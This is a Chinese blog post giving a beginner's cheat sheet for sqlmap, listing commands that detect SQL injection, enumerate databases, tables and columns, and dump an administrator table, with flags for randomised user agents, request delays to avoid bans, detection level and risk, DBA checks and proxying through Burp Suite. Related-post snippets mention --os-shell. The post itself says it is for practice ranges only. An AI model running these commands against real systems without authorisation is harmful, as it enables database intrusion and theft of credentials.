sqlmap最基础用法(1)

最新推荐文章于 2024-07-17 20:22:19 发布
最新推荐文章于 2024-07-17 20:22:19 发布
阅读量345 收藏
点赞数 10
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ch_ycc/article/details/137838579
版权

本文章仅限于靶场使用,请勿用于未授权的违法攻击!!

用户滥用造成的一切后果自负!!

使用者请务必遵守当地法律!!

1.判断是否存在sql注入

python sqlmap.py -u 带有参数的url目标

2.跑数据库

python sqlmap.py -u 带有参数的url目标 --dbs

3.跑当前数据库

python sqlmap.py -u 带有参数的url目标 --current-db

4.跑表

python sqlmap.py -u 带有参数的url目标 -D 数据库 --tables

5.跑列

python sqlmap.py -u 带有参数的url目标 -D 数据库 -T 管理员表 --columns

6.跑值

python sqlmap.py -u 带有参数的url目标 -D 数据库 -T 管理员表 --dump

(慎用,很危险,不要未经授权碰别人数据)

额外

--random-agent 随即请求头,默认是sqlmap

--delay=1  每次探测延时1秒(防止访问过快被ban)

--level 1-5    一共有5个等级(1-5) 不加 level 时,默认是1;5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。level=2 http cookie会测试,level=3 http user-agent/referer头会测试

--risk  默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试。

一般--level 3 --risk2 

--is -dba   查看当前注入点的数据库权限,如果是显示current user is DBA:False那就是低权限,如果是True那就是高权限,如果是高权限就可以直接拿服务器用下面的这条命令

python sqlmap.py -u 带有参数的url目标 --is-dba

--proxy=http://127.0.0.1:8080流量不发给目标站,直接发给本地8080也就是burpsuite

python sqlmap.py -u带有参数的url目标 --flush-session --proxy=http://127.0.0.1:8080

xYs5
关注
  • 10
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
sqlmap使用技巧(1)
Swee
05-22 319
sqlmap基础设置 1、直连数据库 -d sqlmap.py -d "mysql://账户:密码 @127.0.0.1/数据库名 -f --banner --dbs --users 2、直接对单一url进行探测 -u sqlmap.py -u “http://www.hahaha.com/111.php?=1” --banner --users 3、批量扫描注入 -g sqlmap.py -g “inurl:.php?id=1” 4、强制指定请求方法 –method 例如put方法一般不
sqlmap的--is-dba显示false问题
2302_77302329的博客
05-25 411
如果--is-dba仍然显示False,可以先尝试执行--os-shell命令,如果能够成功创建shell那就说明是dba权限,可能是sqlmap的显示问题,最终还是要看能不能创建shell。mysql>ALTER USER 'root'@'localhost' IDENTIFIED BY '新密码';显示就是root用户了。
sqlmap基础使用方法
j2941174356的博客
09-07 80
sqlmap基础语法sqlmap的一些参数
sqlmap基本用法
Oavinci的博客
06-19 536
最近处于查缺补漏阶段,再重温一遍sqlmap… 写的都是sqlmap最最最基本用法记录(虽然现在能用sqlmap做的题不多了… 我这里对sqli-labs-master第一关进行测试(文字是Windows跑sqlmap命令,图片演示使用的是kali自带的sqlmap) 1、检测注入点 使用-u参数进行设置注入点URL,如果要指定注入的参数,可以使用-p,这里只有一个注入点也可不...
sqlmap基础操作1
08-04
以下将详细介绍SQLMap基础操作,主要关注三种注入模式:布尔型盲注、时间型盲注和报错注入,并结合提供的命令行参数进行解析。 1. **布尔型盲注**: 这种注入方式是通过页面返回结果的不同来判断SQL语句的真假。...
27.Sqlmap基础用法、CTF实战及请求参数设置(一)1
08-03
Sqlmap基础用法、CTF实战及请求参数设置】 Sqlmap是一款强大的自动化SQL注入工具,主要用于检测和利用SQL注入漏洞。它由Python编写,能够自动化地探测、利用和管理SQL注入漏洞,对于网络安全和渗透测试人员来说是...
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。本文旨在帮助渗透测试的小白入门,介绍sqlmap的...
sqlmap-master
01-04
2. **枚举**:一旦找到注入点,SQLMap会枚举出数据库的用户、权限、表名、列名等信息,为后续的攻击提供基础。 3. **数据提取**:通过构造特定的SQL查询,SQLMap可以读取或下载数据库中的任意数据,包括敏感信息如...
sqlmapproject-sqlmap-1.5.3-24-gbce3abc.zip
03-28
1. 自动化探测:SQLMap可以自动识别出各种类型的SQL注入点,包括GET、POST及其他HTTP方法的数据提交方式。 2. 深度扫描:除了基础的注入测试,SQLMap还能进行深度扫描,如盲注、时间基注入、错误注入等。 3. 数据库...
Redis集群和高可用
xiaogengtongxu的博客
07-13 613
主从架构无法实现master和slave角色的自动切换,即当master出现redis服务异常、主机断电、磁盘损坏等问题导致master无法使用,而redis主从复制无法实现自动的故障转移(将slave 自动提升为新master),需要手动修改环境配置,才能切换到slave redis服务器,另外当单台Redis服务器性能无法满足业务写入需求的时候,也无法横向扩展Redis服务的并行写入性能。master和slave角色的无缝切换,让业务无感知从而不影响业务使用。
【星海随笔】vCenter Server 和主机管理。
weixin_41997073的博客
07-16 154
1.方法:删除页面信息,然后断连这个受管主机,断开受管主机的连接不会将其从 vCenter Server 中移除,而只是临时挂起 vCenter Server 执行的所有监控活动。2.方法:在分布式存储中找到该虚拟设备的存储盘,文件里找到相关的vmdk磁盘文件,点击注册虚拟机。当资料不匹配时候,可以删除展示页面,孤立的设备的 匹配位置的信息。断开后,然后重新连接,既可以重新识别受监管的主机。数据库在Vserver中展示的是一个数据库的资料,应该是client的资料。1.确定为资料不匹配导致的展示问题。
Redis数据结构-String篇
时间如瑾 代码如诗
07-12 914
对⼀个内部表示成long型的string执行append, setbit, getrange这些命令,针对的仍然是string的值(即⼗进制表示的字符串),而不是针对内部表⽰的long型进⾏操作。因此,在这些命令的实现中,会把long型先转成字符串再进行相应的操作。String 的内部存储结构⼀般是 sds(Simple Dynamic String,可以动态扩展内存),但是如果⼀个String 类型的 value 的值是数字,那么 Redis 内部会把它转成 long 类型来存储,从⽽减少内存的使用。
docker-compose安装PolarDB-PG数据库
wnfff的博客
07-12 317
docker-compose安装PolarDB-PG数据库
Linux系统的用户组管理和权限以及创建用户
Johaden的博客
07-14 969
因此,我们可以根据每个用户的角色、职位和需求,为他们分配相应的权限,以确保服务器的安全性和有效管理。sudo(superuser do)是在类Unix操作系统中(包括Linux和macOS)常用的一个命令,它允许经过授权的用户以系统管理员(通常是root用户)的权限来运行程序或命令。2.在登陆Ubuntu时,会填写全名、用户名、密码等,所创建的这个用户就是默认用户,其中全名可以类似为一个昵称,用户名为主机名(较正式,不可随意更改)。超级用户可以执行系统上的所有命令,包括系统配置、文件访问和用户管理等。
【MySQL】8.复合查询
weixin_74113106的博客
07-12 669
MySQL复合查询
深入 Dify 源码,洞察 Dify RAG 核心机制
易迟的专栏
07-17 823
之前深入源码对 Dify 的完整流程进行了解读,基本上梳理了 Dify 的实现流程与主要组件。但是在实际部署之后,发现 Dify 现有的 RAG 检索效果没有那么理想。因此个人结合前端页面,配置信息与实现流程,深入查看了私有化部署的 Dify 的技术细节。将核心内容整理在这边,方便大家根据实际的业务场景调整 Dify 知识库的配置,或者根据需要进行二次开发调优。
Apache AGE的WITH子句
最新发布
oscube的博客
07-17 235
使用 WITH,您可以在将输出传递给以下查询部分之前对其进行操作。这些操作可以是结果集中条目的形状和/或数量。WITH 也可以像 RETURN 一样,使用别名对引入结果的表达式进行别名,使用别名作为绑定名称。WITH 还用于将图的读取与图的更新分开。查询的每个部分必须是只读的或只写的。从写入子句转到读取子句时,可以使用可选的 WITH 进行此操作。
sqlmap使用基础
04-27
以下是SQLMAP工具的基础使用方法[^1]: 1. 获取数据库表: ```shell sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security --tables ``` 这个命令将会获取指定URL中的数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值